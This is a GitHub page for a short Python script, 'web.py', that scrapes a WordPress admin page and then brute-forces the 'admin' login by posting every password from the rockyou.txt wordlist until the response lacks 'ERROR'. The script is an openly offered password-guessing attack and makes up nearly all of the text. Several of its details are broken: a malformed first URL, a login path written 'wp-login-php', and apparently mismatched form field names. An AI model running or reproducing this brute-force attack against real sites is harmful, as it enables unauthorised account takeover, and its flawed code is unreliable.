-
Notifications
You must be signed in to change notification settings - Fork 2
/
web.py
34 lines (29 loc) · 920 Bytes
/
web.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#fill in IP and path-to-wordlist
import requests
from bs4 import BeautifulSoup
passfile = "PATH\\rockyou.txt"
req = requests.get("http://<IP>://wp-admin")
h = req.headers
r = req.content
#print("headers :", h)
#print("Content :", r)
soup = BeautifulSoup(r, "html.parser")
print(soup.prettify())
print(soup.title)
img = soup.find_all("a",href=True)
imglist = []
for i in img:
imglist.append(i['href'])
img_set = set(imglist)
for a in img_set:
print(a)
#check html id for input names and change in posting
with open(passfile, "r") as f:
for word in f:
word = word.strip("\n")
posting = requests.post("http://<IP>/wp-login-php", data = {"user_pass":"admin", "pwd":word})
if "ERROR" not in posting.text:
print("succes, the password is : " + word)
break
else:
print("password not found "+word)